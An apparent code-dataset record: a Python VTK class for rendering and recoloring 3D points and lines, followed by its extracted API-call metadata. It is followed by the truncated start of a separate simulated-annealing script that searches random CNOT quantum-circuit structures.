    # Track the new cell indices so later deletions can find them.
    self.line_id_array.add_ids(mem_locations)
    return mem_locations
def del_all_lines(self):
"""
Deletes all lines.
"""
vtk_data = numpy_support.numpy_to_vtkIdTypeArray(np.array([], dtype=np.int64), deep=True)
self.lines.SetCells(0, vtk_data)
vtk_data = numpy_support.numpy_to_vtk(num_array=np.array([]), deep=True, array_type=vtk.VTK_UNSIGNED_CHAR)
self.line_colors.DeepCopy(vtk_data)
self.lines_poly.Modified()
def del_lines(self, line_indices):
#todo: change idarray to use tuples of (start,end) locations and set this to delete those partitions
"""
Delete specific lines.
Args:
line_indices (tuple, list, np.ndarray, np.generic):
An array of integers or a single integer representing line memory locations(s) to delete.
"""
np_data = numpy_support.vtk_to_numpy(self.lines.GetData())
np_color_data = numpy_support.vtk_to_numpy(self.line_colors)
if isinstance(line_indices, (tuple, list, np.ndarray, np.generic)):
last_loc = -1
loc = 0
np_new_data = []
np_new_color_data = []
for i in range(len(line_indices)):
loc = self.line_id_array.pop_id(line_indices[i])
if loc==None:
#todo: put warning here
continue
if len(np_new_data) > 0:
np_new_data = np.append(np_new_data, np_data[(last_loc + 1) * 3:loc * 3], axis=0)
else:
np_new_data = np_data[(last_loc + 1) * 3:loc * 3]
if len(np_new_color_data) > 0:
np_new_color_data = np.append(np_new_color_data, np_color_data[(last_loc + 1):loc], axis=0)
else:
np_new_color_data = np_color_data[(last_loc + 1):loc]
last_loc = loc
last_loc = loc
loc = len(np_data) / 3
np_data = np.append(np_new_data, np_data[(last_loc + 1) * 3:loc * 3], axis=0)
np_data = np_data.astype(np.int64)
np_color_data = np.append(np_new_color_data, np_color_data[(last_loc + 1):loc], axis=0)
else:
raise TypeError("Deletion list should be tuple, list, np.ndarray, or np.generic")
vtk_data = numpy_support.numpy_to_vtkIdTypeArray(np_data, deep=True)
self.lines.SetCells(int(len(np_data) / 3), vtk_data)
vtk_data = numpy_support.numpy_to_vtk(num_array=np_color_data, deep=True, array_type=vtk.VTK_UNSIGNED_CHAR)
self.line_colors.DeepCopy(vtk_data)
self.lines_poly.Modified()
def del_points(self, point_indices):
"""
Delete specific points.
Args:
point_indices (tuple, list, np.ndarray, np.generic):
An array of integers or a single integer representing point memory locations(s) to delete.
"""
np_point_data = numpy_support.vtk_to_numpy(self.points.GetData())
np_point_color_data = numpy_support.vtk_to_numpy(self.point_colors)
np_vert_data = numpy_support.vtk_to_numpy(self.point_vertices.GetData())#1,1,1,2,1,3,1,4,1,5,1,6...
print(len(np_vert_data), len(np_point_data), len(np_point_color_data))
if isinstance(point_indices, (tuple, list, np.ndarray, np.generic)):
last_loc = -1
loc = 0
subtractor = 0
np_new_data = []
np_new_color_data = []
np_new_verts = []
for i in range(len(point_indices)):
loc = self.point_id_array.pop_id(point_indices[i])
if loc == None:
# todo: put warning here
continue
subtractor+=1
#I could just remove the end of the array, but this keeps the lines attached to the same points
if len(np_new_verts) >0:
np_new_verts = np.append(np_new_verts, np_vert_data[(last_loc+1)*2:loc*2], axis = 0)
else:
np_new_verts = np_vert_data[(last_loc+1)*2: loc*2]
if len(np_new_data) > 0:
np_new_data = np.append(np_new_data, np_point_data[(last_loc + 1):loc], axis=0)
else:
np_new_data = np_point_data[(last_loc + 1):loc]
if len(np_new_color_data) > 0:
np_new_color_data = np.append(np_new_color_data, np_point_color_data[(last_loc + 1)*3:loc*3], axis=0)
else:
np_new_color_data = np_point_color_data[(last_loc + 1):loc]
last_loc = loc
if loc == None:
return
last_loc = loc
loc = len(np_point_data)
np_point_data = np.append(np_new_data, np_point_data[(last_loc + 1):loc], axis=0)
np_point_color_data = np.append(np_new_color_data, np_point_color_data[(last_loc + 1):loc], axis=0)
np_vert_data = np.append(np_new_verts, np_vert_data[(last_loc + 1)*2:loc*2], axis = 0)
else:
raise TypeError("Deletion list should be tuple, list, np.ndarray, or np.generic")
vtk_data = numpy_support.numpy_to_vtk(np_point_data, deep=True)
self.points.SetData(vtk_data)
vtk_data = numpy_support.numpy_to_vtk(num_array=np_point_color_data, deep=True, array_type=vtk.VTK_UNSIGNED_CHAR)
self.point_colors.DeepCopy(vtk_data)
vtk_data = numpy_support.numpy_to_vtkIdTypeArray(np_vert_data, deep=True)
self.point_vertices.SetCells(int(len(np_vert_data) / 2), vtk_data)
self.lines_poly.Modified()
def add_points(self, points, point_colors):
"""
Adds points in 3d space.
Args:
points (tuple, list, np.ndarray, np.generic):
An array in the format of [[x1,y1,z1], [x2,y2,x2], ..., [xn,yn,zn]]
point_colors (tuple, list, np.ndarray, np.generic):
An array in the format of [[r1, g1, b1], [r2, g2, b2], ...], with the same length as the number of
points to be added.
Returns:
"""
assert (isinstance(points, (list, tuple, np.ndarray, np.generic)))
assert (isinstance(point_colors, (list, tuple, np.ndarray, np.generic)))
np_point_data = numpy_support.vtk_to_numpy(self.points.GetData())
np_point_color_data = numpy_support.vtk_to_numpy(self.point_colors)
np_vert_data = numpy_support.vtk_to_numpy(self.point_vertices.GetData())
print(np_vert_data)
for i in range(len(points)):
#todo: modify pointer_id_array to set free pointers to deleted data, not deleted data locations
if len(self.point_id_array.free_pointers)>0:
np_vert_data = np.append(np_vert_data, [1,self.point_id_array.free_pointers.pop()])
else:
np_vert_data = np.append(np_vert_data,[1, len(np_vert_data)/2])
mem_locations = range(int(len(np_point_data)), int((len(np_point_data) + len(points))))
if len(np_point_data) > 0:
np_point_data = np.append(np_point_data, points, axis=0)
else:
np_point_data = points
if len(point_colors) ==1:
points = np.array(points)
point_colors = np.tile(point_colors, (points.shape[0], 1))
if len(np_point_color_data) > 0:
np_point_color_data = np.append(np_point_color_data, point_colors, axis=0)
else:
np_point_color_data = point_colors
vtk_point_data = numpy_support.numpy_to_vtk(num_array=np_point_data, deep=True, array_type=vtk.VTK_FLOAT)
self.points.SetData(vtk_point_data)
vtk_data = numpy_support.numpy_to_vtkIdTypeArray(np_vert_data.astype(np.int64), deep=True)
self.point_vertices.SetCells(int(len(np_vert_data) / 2), vtk_data)
vtk_point_color_data = numpy_support.numpy_to_vtk(num_array=np_point_color_data,
deep=True, array_type=vtk.VTK_UNSIGNED_CHAR)
self.point_colors.DeepCopy(vtk_point_color_data)
self.points_poly.Modified()
self.point_id_array.add_ids(mem_locations)
#print(self.point_id_array)
return mem_locations
def add_point_field(self, widths, normal, center, color):
"""
Adds a rectangular field of points.
Args:
widths (tuple, list, np.ndarray, np.generic): an array defining the widths of each dimension of the field.
normal (tuple, list, np.ndarray, np.generic): an array defining the normal to the field. Specifies angle.
center (tuple, list, np.ndarray, np.generic): an array defining the central position of the field.
color (tuple, list, np.ndarray, np.generic):
An array in the format of [[r1, g1, b1], [r2, g2, b2], ...], with the same length as the number of
points to be added, or a single color in the form of [[r1, g1, b1]].
Returns:
A list of integers representing the memory locations where the points were added.
"""
true_normal = normalize(normal)
if not np.allclose(true_normal, [1, 0, 0]):
zn = np.cross(true_normal, [1, 0, 0])
xn = np.cross(true_normal, zn)
else:
xn = [1, 0, 0]
zn = [0, 0, 1]
point_field = np.array([])
#todo: replace for loops with numpy or gpu ops
for z in range(-int(m.floor(widths[2] / 2.0)), int(m.ceil(widths[2] / 2.0))):
for y in range(-int(m.floor(widths[1] / 2.0)), int(m.ceil(widths[1] / 2.0))):
for x in range(-int(m.floor(widths[0] / 2.0)), int(m.ceil(widths[0] / 2.0))):
vector_space_matrix = np.column_stack(
(np.transpose(xn), np.transpose(true_normal), np.transpose(zn)))
translation = np.matmul([x, y, z], vector_space_matrix)
point_location = [center[0], center[1], center[2]] + translation
point_location = [point_location]
if len(point_field)>0:
point_field = np.append(point_field, point_location, axis = 0)
else:
point_field = point_location
return self.add_points(point_field, color) #returns ids
def set_bg_color(self, color):
"""
Sets the background color of the viewport.
Args:
color (tuple, list, np.ndarray, np.generic): a single rgb color in the form of [[int, int, int]]
"""
r, g, b = color[0]
r,g,b = (r/255.,g/255.,b/255.)
self.renderer.SetBackground((minmax(r, 0, 1), minmax(g, 0, 1), minmax(b, 0, 1)))
self.renderer.Modified()
def set_all_point_colors(self, color):
"""
Sets the color of every point.
Args:
color (tuple, list, np.ndarray, np.generic): a single rgb color in the form of [[int, int, int]]
"""
np_color_data = numpy_support.vtk_to_numpy(self.point_colors)
np_color_data = np.tile(color, (np_color_data.shape[0], 1))
vtk_data = numpy_support.numpy_to_vtk(num_array=np_color_data, deep=True, array_type=vtk.VTK_UNSIGNED_CHAR)
self.point_colors.DeepCopy(vtk_data)
def set_point_colors(self, colors, point_indices=None):
if point_indices is None:
if isinstance(colors, (list, tuple, np.ndarray, np.generic)):
vtk_data = numpy_support.numpy_to_vtk(num_array=colors, deep=True, array_type=vtk.VTK_UNSIGNED_CHAR)
self.point_colors.DeepCopy(vtk_data)
elif isinstance(point_indices, (list, tuple, np.ndarray, np.generic)):
np_color_data = numpy_support.vtk_to_numpy(self.point_colors)
np_color_data[point_indices] = colors
vtk_data = numpy_support.numpy_to_vtk(num_array=np_color_data, deep=True, array_type=vtk.VTK_UNSIGNED_CHAR)
self.point_colors.DeepCopy(vtk_data)
# self.points_poly.GetPointData().GetScalars().Modified()
self.points_poly.Modified()
def setup_lerp_all_point_colors(self, color, fade_time):
"""
Sets all points to the same color, but uses lerping to slowly change the colors.
Args:
color ():
fade_time ():
"""
np_color_data = numpy_support.vtk_to_numpy(self.point_colors)
self.next_colors = np.tile(color, (np_color_data.shape[0], 1))
self.prev_colors = numpy_support.vtk_to_numpy(self.point_colors)
self.lerp_fade_time = fade_time
self.remaining_lerp_fade_time = fade_time
def lerp_point_colors(self, colors, fade_time, point_indices=None):
"""
Sets colors for specific points, but uses lerping to slowly change those colors.
Args:
colors ():
fade_time ():
point_indices ():
"""
if isinstance(self.next_colors, (np.ndarray, np.generic)):
if isinstance(point_indices, (list, tuple, np.ndarray, np.generic)):
self.next_colors[point_indices] = colors
else:
self.next_colors = colors
self.next_color_indices = None
elif isinstance(point_indices, (list, tuple, np.ndarray, np.generic)) or isinstance(colors, (list, tuple)):
if self.lerp_fade_time > 0:
self.next_colors = np.append(self.next_colors, colors)
if point_indices is not None:
self.next_color_indices = np.append(self.next_color_indices, point_indices)
else:
self.next_colors = colors
self.next_color_indices = point_indices
# must should not already be lerping
self.prev_colors = numpy_support.vtk_to_numpy(self.point_colors)
# fade time in seconds, float
self.lerp_fade_time = fade_time
self.remaining_lerp_fade_time = fade_time
def set_lerp_remainder(self, lerp_remainder):
"""
Sets the portion of color from the previous color set remains after the lerp has been fully run.
Args:
lerp_remainder ():
"""
self.lerp_multiplier = 1 - lerp_remainder
def _calculate_point_color_lerp(self):
"""
Linearly interpolates colors. In addition to making animation look smoother, it helps prevent seizures a little.
Only a little though, and it has to be used correctly. Still, using it at all helps.
"""
if self.remaining_lerp_fade_time > 0:
# print(self.lerp_fade_time, self.remaining_lerp_fade_time)
lerp_val = self.lerp_multiplier * (
self.lerp_fade_time - self.remaining_lerp_fade_time) / self.lerp_fade_time
# print(lerp_val)
diff_array = (self.prev_colors - self.next_colors)
lerp_diff_array = diff_array * lerp_val
# print(lerp_diff_array)
lerp_colors = self.prev_colors - lerp_diff_array
# print(lerp_colors)
if isinstance(lerp_colors, (np.ndarray, np.generic)):
vtk_data = numpy_support.numpy_to_vtk(num_array=lerp_colors, deep=True,
array_type=vtk.VTK_UNSIGNED_CHAR)
self.point_colors.DeepCopy(vtk_data)
# self.points_poly.GetPointData().GetScalars().Modified()
self.points_poly.Modified()
self.remaining_lerp_fade_time -= self.loop_change_in_time
# print(self.remaining_lerp_fade_time)
def position_points(self, positions, point_indices=None):
#todo:unit test
"""
Untested with most recent changes.
Sets the positions of specific points, all points, or one point.
Args:
positions ():
point_indices ():
"""
if point_indices == None:
vtk_data = numpy_support.numpy_to_vtk(num_array=positions, deep=True, array_type=vtk.VTK_FLOAT)
self.points.DeepCopy(vtk_data)
elif isinstance(point_indices, (list, tuple)):
if isinstance(positions, (list, tuple)):
for i in range(len(point_indices)):
x, y, z = positions[i % len(positions)]
self.points.SetPoint(point_indices[i], (x, y, z))
else:
for i in range(len(point_indices)):
x, y, z = positions
self.points.SetPoint(point_indices[i], (x, y, z))
else:
x, y, z = positions
self.points.SetPoint(point_indices, (x, y, z))
self.points_poly.Modified()
def add_key_input_functions(self, keydic):
"""
Sets functions to be called when specific keys are pressed, in order from shallowest to deepest dictionaries.
If a key is already in the dictionary, it will be replaced.
Args:
keydic ():
"""
self.interactor_style.append_input_combinations(keydic)
def at_start(self):
"""
Function to be run after class instantiation and vtk start up. Useful for setting things that can only be set
after VTK is running.
"""
pass
def loop(self, obj, event):
"""
Function called every few milliseconds when VTK is set to call. Variables that need updating like change_in_time
can be set here.
Args:
obj ():
event ():
"""
self.loop_change_in_time = time.clock() - self._loop_time
self._loop_time = time.clock()
self._calculate_point_color_lerp()
pass
def at_end(self):
"""
Function called when animation is ended.
"""
self.interactive_renderer.RemoveAllObservers()
def exit(self):
# needed to stop previous setups from being run on next class call
# proper cleanup
self.interactive_renderer.TerminateApp()
def execute(self, obj, event):
"""
Function called to start animation.
Args:
obj ():
event ():
"""
if not self._started:
self.at_start()
self._started = True
self.loop(obj, event)
self.points_poly.GetPointData().GetScalars().Modified()
self.points_poly.Modified()
self.interactive_renderer = obj
self.interactive_renderer.GetRenderWindow().Render()
| [
"numpy.tile",
"numpy.allclose",
"math.ceil",
"numpy.cross",
"time.clock",
"math.floor",
"svtk.lib.toolbox.idarray.IdArray",
"vtk.util.numpy_support.numpy_to_vtkIdTypeArray",
"svtk.lib.toolbox.integer.minmax",
"numpy.append",
"numpy.array",
"numpy.matmul",
"vtk.util.numpy_support.numpy_to_vtk... | [((1209, 1221), 'time.clock', 'time.clock', ([], {}), '()\n', (1219, 1221), False, 'import time\n'), ((1264, 1276), 'time.clock', 'time.clock', ([], {}), '()\n', (1274, 1276), False, 'import time\n'), ((1322, 1334), 'time.clock', 'time.clock', ([], {}), '()\n', (1332, 1334), False, 'import time\n'), ((1361, 1373), 'time.clock', 'time.clock', ([], {}), '()\n', (1371, 1373), False, 'import time\n'), ((1513, 1522), 'svtk.lib.toolbox.idarray.IdArray', 'IdArray', ([], {}), '()\n', (1520, 1522), False, 'from svtk.lib.toolbox.idarray import IdArray\n'), ((1553, 1562), 'svtk.lib.toolbox.idarray.IdArray', 'IdArray', ([], {}), '()\n', (1560, 1562), False, 'from svtk.lib.toolbox.idarray import IdArray\n'), ((2506, 2550), 'vtk.util.numpy_support.vtk_to_numpy', 'numpy_support.vtk_to_numpy', (['self.line_colors'], {}), '(self.line_colors)\n', (2532, 2550), False, 'from vtk.util import numpy_support\n'), ((2734, 2764), 'numpy.append', 'np.append', (['np_line_data', 'lines'], {}), '(np_line_data, lines)\n', (2743, 2764), True, 'import numpy as np\n'), ((2974, 3036), 'vtk.util.numpy_support.numpy_to_vtkIdTypeArray', 'numpy_support.numpy_to_vtkIdTypeArray', (['np_line_data'], {'deep': '(True)'}), '(np_line_data, deep=True)\n', (3011, 3036), False, 'from vtk.util import numpy_support\n'), ((3139, 3244), 'vtk.util.numpy_support.numpy_to_vtk', 'numpy_support.numpy_to_vtk', ([], {'num_array': 'np_line_color_data', 'deep': '(True)', 'array_type': 'vtk.VTK_UNSIGNED_CHAR'}), '(num_array=np_line_color_data, deep=True,\n array_type=vtk.VTK_UNSIGNED_CHAR)\n', (3165, 3244), False, 'from vtk.util import numpy_support\n'), ((4367, 4411), 'vtk.util.numpy_support.vtk_to_numpy', 'numpy_support.vtk_to_numpy', (['self.line_colors'], {}), '(self.line_colors)\n', (4393, 4411), False, 'from vtk.util import numpy_support\n'), ((5769, 5826), 'vtk.util.numpy_support.numpy_to_vtkIdTypeArray', 'numpy_support.numpy_to_vtkIdTypeArray', (['np_data'], {'deep': 
'(True)'}), '(np_data, deep=True)\n', (5806, 5826), False, 'from vtk.util import numpy_support\n'), ((5908, 6009), 'vtk.util.numpy_support.numpy_to_vtk', 'numpy_support.numpy_to_vtk', ([], {'num_array': 'np_color_data', 'deep': '(True)', 'array_type': 'vtk.VTK_UNSIGNED_CHAR'}), '(num_array=np_color_data, deep=True, array_type=\n vtk.VTK_UNSIGNED_CHAR)\n', (5934, 6009), False, 'from vtk.util import numpy_support\n'), ((6474, 6519), 'vtk.util.numpy_support.vtk_to_numpy', 'numpy_support.vtk_to_numpy', (['self.point_colors'], {}), '(self.point_colors)\n', (6500, 6519), False, 'from vtk.util import numpy_support\n'), ((8646, 8698), 'vtk.util.numpy_support.numpy_to_vtk', 'numpy_support.numpy_to_vtk', (['np_point_data'], {'deep': '(True)'}), '(np_point_data, deep=True)\n', (8672, 8698), False, 'from vtk.util import numpy_support\n'), ((8757, 8863), 'vtk.util.numpy_support.numpy_to_vtk', 'numpy_support.numpy_to_vtk', ([], {'num_array': 'np_point_color_data', 'deep': '(True)', 'array_type': 'vtk.VTK_UNSIGNED_CHAR'}), '(num_array=np_point_color_data, deep=True,\n array_type=vtk.VTK_UNSIGNED_CHAR)\n', (8783, 8863), False, 'from vtk.util import numpy_support\n'), ((8925, 8987), 'vtk.util.numpy_support.numpy_to_vtkIdTypeArray', 'numpy_support.numpy_to_vtkIdTypeArray', (['np_vert_data'], {'deep': '(True)'}), '(np_vert_data, deep=True)\n', (8962, 8987), False, 'from vtk.util import numpy_support\n'), ((9859, 9904), 'vtk.util.numpy_support.vtk_to_numpy', 'numpy_support.vtk_to_numpy', (['self.point_colors'], {}), '(self.point_colors)\n', (9885, 9904), False, 'from vtk.util import numpy_support\n'), ((11027, 11120), 'vtk.util.numpy_support.numpy_to_vtk', 'numpy_support.numpy_to_vtk', ([], {'num_array': 'np_point_data', 'deep': '(True)', 'array_type': 'vtk.VTK_FLOAT'}), '(num_array=np_point_data, deep=True, array_type=\n vtk.VTK_FLOAT)\n', (11053, 11120), False, 'from vtk.util import numpy_support\n'), ((11369, 11475), 'vtk.util.numpy_support.numpy_to_vtk', 
'numpy_support.numpy_to_vtk', ([], {'num_array': 'np_point_color_data', 'deep': '(True)', 'array_type': 'vtk.VTK_UNSIGNED_CHAR'}), '(num_array=np_point_color_data, deep=True,\n array_type=vtk.VTK_UNSIGNED_CHAR)\n', (11395, 11475), False, 'from vtk.util import numpy_support\n'), ((12629, 12646), 'svtk.lib.toolbox.numpy_helpers.normalize', 'normalize', (['normal'], {}), '(normal)\n', (12638, 12646), False, 'from svtk.lib.toolbox.numpy_helpers import normalize\n'), ((12882, 12894), 'numpy.array', 'np.array', (['[]'], {}), '([])\n', (12890, 12894), True, 'import numpy as np\n'), ((14534, 14579), 'vtk.util.numpy_support.vtk_to_numpy', 'numpy_support.vtk_to_numpy', (['self.point_colors'], {}), '(self.point_colors)\n', (14560, 14579), False, 'from vtk.util import numpy_support\n'), ((14604, 14647), 'numpy.tile', 'np.tile', (['color', '(np_color_data.shape[0], 1)'], {}), '(color, (np_color_data.shape[0], 1))\n', (14611, 14647), True, 'import numpy as np\n'), ((14667, 14768), 'vtk.util.numpy_support.numpy_to_vtk', 'numpy_support.numpy_to_vtk', ([], {'num_array': 'np_color_data', 'deep': '(True)', 'array_type': 'vtk.VTK_UNSIGNED_CHAR'}), '(num_array=np_color_data, deep=True, array_type=\n vtk.VTK_UNSIGNED_CHAR)\n', (14693, 14768), False, 'from vtk.util import numpy_support\n'), ((15885, 15930), 'vtk.util.numpy_support.vtk_to_numpy', 'numpy_support.vtk_to_numpy', (['self.point_colors'], {}), '(self.point_colors)\n', (15911, 15930), False, 'from vtk.util import numpy_support\n'), ((15958, 16001), 'numpy.tile', 'np.tile', (['color', '(np_color_data.shape[0], 1)'], {}), '(color, (np_color_data.shape[0], 1))\n', (15965, 16001), True, 'import numpy as np\n'), ((16029, 16074), 'vtk.util.numpy_support.vtk_to_numpy', 'numpy_support.vtk_to_numpy', (['self.point_colors'], {}), '(self.point_colors)\n', (16055, 16074), False, 'from vtk.util import numpy_support\n'), ((21145, 21157), 'time.clock', 'time.clock', ([], {}), '()\n', (21155, 21157), False, 'import time\n'), ((2839, 2889), 
'numpy.append', 'np.append', (['np_line_color_data', 'line_colors'], {'axis': '(0)'}), '(np_line_color_data, line_colors, axis=0)\n', (2848, 2889), True, 'import numpy as np\n'), ((3608, 3636), 'numpy.array', 'np.array', (['[]'], {'dtype': 'np.int64'}), '([], dtype=np.int64)\n', (3616, 3636), True, 'import numpy as np\n'), ((5424, 5491), 'numpy.append', 'np.append', (['np_new_data', 'np_data[(last_loc + 1) * 3:loc * 3]'], {'axis': '(0)'}), '(np_new_data, np_data[(last_loc + 1) * 3:loc * 3], axis=0)\n', (5433, 5491), True, 'import numpy as np\n'), ((5569, 5638), 'numpy.append', 'np.append', (['np_new_color_data', 'np_color_data[last_loc + 1:loc]'], {'axis': '(0)'}), '(np_new_color_data, np_color_data[last_loc + 1:loc], axis=0)\n', (5578, 5638), True, 'import numpy as np\n'), ((8239, 8302), 'numpy.append', 'np.append', (['np_new_data', 'np_point_data[last_loc + 1:loc]'], {'axis': '(0)'}), '(np_new_data, np_point_data[last_loc + 1:loc], axis=0)\n', (8248, 8302), True, 'import numpy as np\n'), ((8340, 8415), 'numpy.append', 'np.append', (['np_new_color_data', 'np_point_color_data[last_loc + 1:loc]'], {'axis': '(0)'}), '(np_new_color_data, np_point_color_data[last_loc + 1:loc], axis=0)\n', (8349, 8415), True, 'import numpy as np\n'), ((8446, 8519), 'numpy.append', 'np.append', (['np_new_verts', 'np_vert_data[(last_loc + 1) * 2:loc * 2]'], {'axis': '(0)'}), '(np_new_verts, np_vert_data[(last_loc + 1) * 2:loc * 2], axis=0)\n', (8455, 8519), True, 'import numpy as np\n'), ((10577, 10617), 'numpy.append', 'np.append', (['np_point_data', 'points'], {'axis': '(0)'}), '(np_point_data, points, axis=0)\n', (10586, 10617), True, 'import numpy as np\n'), ((10723, 10739), 'numpy.array', 'np.array', (['points'], {}), '(points)\n', (10731, 10739), True, 'import numpy as np\n'), ((10767, 10810), 'numpy.tile', 'np.tile', (['point_colors', '(points.shape[0], 1)'], {}), '(point_colors, (points.shape[0], 1))\n', (10774, 10810), True, 'import numpy as np\n'), ((10887, 10939), 
'numpy.append', 'np.append', (['np_point_color_data', 'point_colors'], {'axis': '(0)'}), '(np_point_color_data, point_colors, axis=0)\n', (10896, 10939), True, 'import numpy as np\n'), ((12662, 12697), 'numpy.allclose', 'np.allclose', (['true_normal', '[1, 0, 0]'], {}), '(true_normal, [1, 0, 0])\n', (12673, 12697), True, 'import numpy as np\n'), ((12716, 12748), 'numpy.cross', 'np.cross', (['true_normal', '[1, 0, 0]'], {}), '(true_normal, [1, 0, 0])\n', (12724, 12748), True, 'import numpy as np\n'), ((12766, 12791), 'numpy.cross', 'np.cross', (['true_normal', 'zn'], {}), '(true_normal, zn)\n', (12774, 12791), True, 'import numpy as np\n'), ((19482, 19571), 'vtk.util.numpy_support.numpy_to_vtk', 'numpy_support.numpy_to_vtk', ([], {'num_array': 'positions', 'deep': '(True)', 'array_type': 'vtk.VTK_FLOAT'}), '(num_array=positions, deep=True, array_type=vtk.\n VTK_FLOAT)\n', (19508, 19571), False, 'from vtk.util import numpy_support\n'), ((21088, 21100), 'time.clock', 'time.clock', ([], {}), '()\n', (21098, 21100), False, 'import time\n'), ((3747, 3759), 'numpy.array', 'np.array', (['[]'], {}), '([])\n', (3755, 3759), True, 'import numpy as np\n'), ((13009, 13032), 'math.ceil', 'm.ceil', (['(widths[2] / 2.0)'], {}), '(widths[2] / 2.0)\n', (13015, 13032), True, 'import math as m\n'), ((14194, 14209), 'svtk.lib.toolbox.integer.minmax', 'minmax', (['r', '(0)', '(1)'], {}), '(r, 0, 1)\n', (14200, 14209), False, 'from svtk.lib.toolbox.integer import minmax\n'), ((14211, 14226), 'svtk.lib.toolbox.integer.minmax', 'minmax', (['g', '(0)', '(1)'], {}), '(g, 0, 1)\n', (14217, 14226), False, 'from svtk.lib.toolbox.integer import minmax\n'), ((14228, 14243), 'svtk.lib.toolbox.integer.minmax', 'minmax', (['b', '(0)', '(1)'], {}), '(b, 0, 1)\n', (14234, 14243), False, 'from svtk.lib.toolbox.integer import minmax\n'), ((15005, 15099), 'vtk.util.numpy_support.numpy_to_vtk', 'numpy_support.numpy_to_vtk', ([], {'num_array': 'colors', 'deep': '(True)', 'array_type': 
'vtk.VTK_UNSIGNED_CHAR'}), '(num_array=colors, deep=True, array_type=vtk.\n VTK_UNSIGNED_CHAR)\n', (15031, 15099), False, 'from vtk.util import numpy_support\n'), ((15255, 15300), 'vtk.util.numpy_support.vtk_to_numpy', 'numpy_support.vtk_to_numpy', (['self.point_colors'], {}), '(self.point_colors)\n', (15281, 15300), False, 'from vtk.util import numpy_support\n'), ((15374, 15475), 'vtk.util.numpy_support.numpy_to_vtk', 'numpy_support.numpy_to_vtk', ([], {'num_array': 'np_color_data', 'deep': '(True)', 'array_type': 'vtk.VTK_UNSIGNED_CHAR'}), '(num_array=np_color_data, deep=True, array_type=\n vtk.VTK_UNSIGNED_CHAR)\n', (15400, 15475), False, 'from vtk.util import numpy_support\n'), ((18690, 18789), 'vtk.util.numpy_support.numpy_to_vtk', 'numpy_support.numpy_to_vtk', ([], {'num_array': 'lerp_colors', 'deep': '(True)', 'array_type': 'vtk.VTK_UNSIGNED_CHAR'}), '(num_array=lerp_colors, deep=True, array_type=vtk\n .VTK_UNSIGNED_CHAR)\n', (18716, 18789), False, 'from vtk.util import numpy_support\n'), ((4890, 4957), 'numpy.append', 'np.append', (['np_new_data', 'np_data[(last_loc + 1) * 3:loc * 3]'], {'axis': '(0)'}), '(np_new_data, np_data[(last_loc + 1) * 3:loc * 3], axis=0)\n', (4899, 4957), True, 'import numpy as np\n'), ((5138, 5207), 'numpy.append', 'np.append', (['np_new_color_data', 'np_color_data[last_loc + 1:loc]'], {'axis': '(0)'}), '(np_new_color_data, np_color_data[last_loc + 1:loc], axis=0)\n', (5147, 5207), True, 'import numpy as np\n'), ((7394, 7467), 'numpy.append', 'np.append', (['np_new_verts', 'np_vert_data[(last_loc + 1) * 2:loc * 2]'], {'axis': '(0)'}), '(np_new_verts, np_vert_data[(last_loc + 1) * 2:loc * 2], axis=0)\n', (7403, 7467), True, 'import numpy as np\n'), ((7633, 7696), 'numpy.append', 'np.append', (['np_new_data', 'np_point_data[last_loc + 1:loc]'], {'axis': '(0)'}), '(np_new_data, np_point_data[last_loc + 1:loc], axis=0)\n', (7642, 7696), True, 'import numpy as np\n'), ((7877, 7967), 'numpy.append', 'np.append', (['np_new_color_data', 
'np_point_color_data[(last_loc + 1) * 3:loc * 3]'], {'axis': '(0)'}), '(np_new_color_data, np_point_color_data[(last_loc + 1) * 3:loc * 3\n ], axis=0)\n', (7886, 7967), True, 'import numpy as np\n'), ((12978, 13002), 'math.floor', 'm.floor', (['(widths[2] / 2.0)'], {}), '(widths[2] / 2.0)\n', (12985, 13002), True, 'import math as m\n'), ((13099, 13122), 'math.ceil', 'm.ceil', (['(widths[1] / 2.0)'], {}), '(widths[1] / 2.0)\n', (13105, 13122), True, 'import math as m\n'), ((13402, 13443), 'numpy.matmul', 'np.matmul', (['[x, y, z]', 'vector_space_matrix'], {}), '([x, y, z], vector_space_matrix)\n', (13411, 13443), True, 'import numpy as np\n'), ((16945, 16980), 'numpy.append', 'np.append', (['self.next_colors', 'colors'], {}), '(self.next_colors, colors)\n', (16954, 16980), True, 'import numpy as np\n'), ((17327, 17372), 'vtk.util.numpy_support.vtk_to_numpy', 'numpy_support.vtk_to_numpy', (['self.point_colors'], {}), '(self.point_colors)\n', (17353, 17372), False, 'from vtk.util import numpy_support\n'), ((13068, 13092), 'math.floor', 'm.floor', (['(widths[1] / 2.0)'], {}), '(widths[1] / 2.0)\n', (13075, 13092), True, 'import math as m\n'), ((13193, 13216), 'math.ceil', 'm.ceil', (['(widths[0] / 2.0)'], {}), '(widths[0] / 2.0)\n', (13199, 13216), True, 'import math as m\n'), ((13664, 13710), 'numpy.append', 'np.append', (['point_field', 'point_location'], {'axis': '(0)'}), '(point_field, point_location, axis=0)\n', (13673, 13710), True, 'import numpy as np\n'), ((17073, 17122), 'numpy.append', 'np.append', (['self.next_color_indices', 'point_indices'], {}), '(self.next_color_indices, point_indices)\n', (17082, 17122), True, 'import numpy as np\n'), ((13162, 13186), 'math.floor', 'm.floor', (['(widths[0] / 2.0)'], {}), '(widths[0] / 2.0)\n', (13169, 13186), True, 'import math as m\n'), ((13304, 13320), 'numpy.transpose', 'np.transpose', (['xn'], {}), '(xn)\n', (13316, 13320), True, 'import numpy as np\n'), ((13322, 13347), 'numpy.transpose', 'np.transpose', 
(['true_normal'], {}), '(true_normal)\n', (13334, 13347), True, 'import numpy as np\n'), ((13349, 13365), 'numpy.transpose', 'np.transpose', (['zn'], {}), '(zn)\n', (13361, 13365), True, 'import numpy as np\n')] |
import time
import numpy as np
from tqdm import tqdm
from utils import RandomCNOT, RandomCNOTs
def SimulatedAnnealing(quantum_count, layer_count, solver, epochs=100, save_path=None, global_best_score=0):
    """
    Simulated-annealing-style search over random CNOT layer structures.

    Args:
        quantum_count: number of qubits per CNOT layer.
        layer_count: number of CNOT layers in the circuit.
        solver: callable taking a CNOT structure and returning (score, model).
        epochs: number of annealing rounds.
        save_path: optional path where the best model is written.
        global_best_score: only save models scoring above this threshold.

    Returns:
        (best_score, best_model, best_cnot)
    """
    # Seed unconditionally from the first random circuit so cnot_seed /
    # best_model / best_cnot are always bound (previously a NameError was
    # raised later if the first score was not greater than 0).
    cnot = RandomCNOTs(quantum_count, layer_count)
    sc, model = solver(cnot)
    best_score = sc
    cnot_seed = cnot
    best_model = model
    best_cnot = cnot
    if save_path is not None and best_score > global_best_score:
        with open(save_path, 'w') as f:
            f.write(best_model)
    start_time = time.time()
    for epoch in range(epochs):
        for i in range(layer_count):
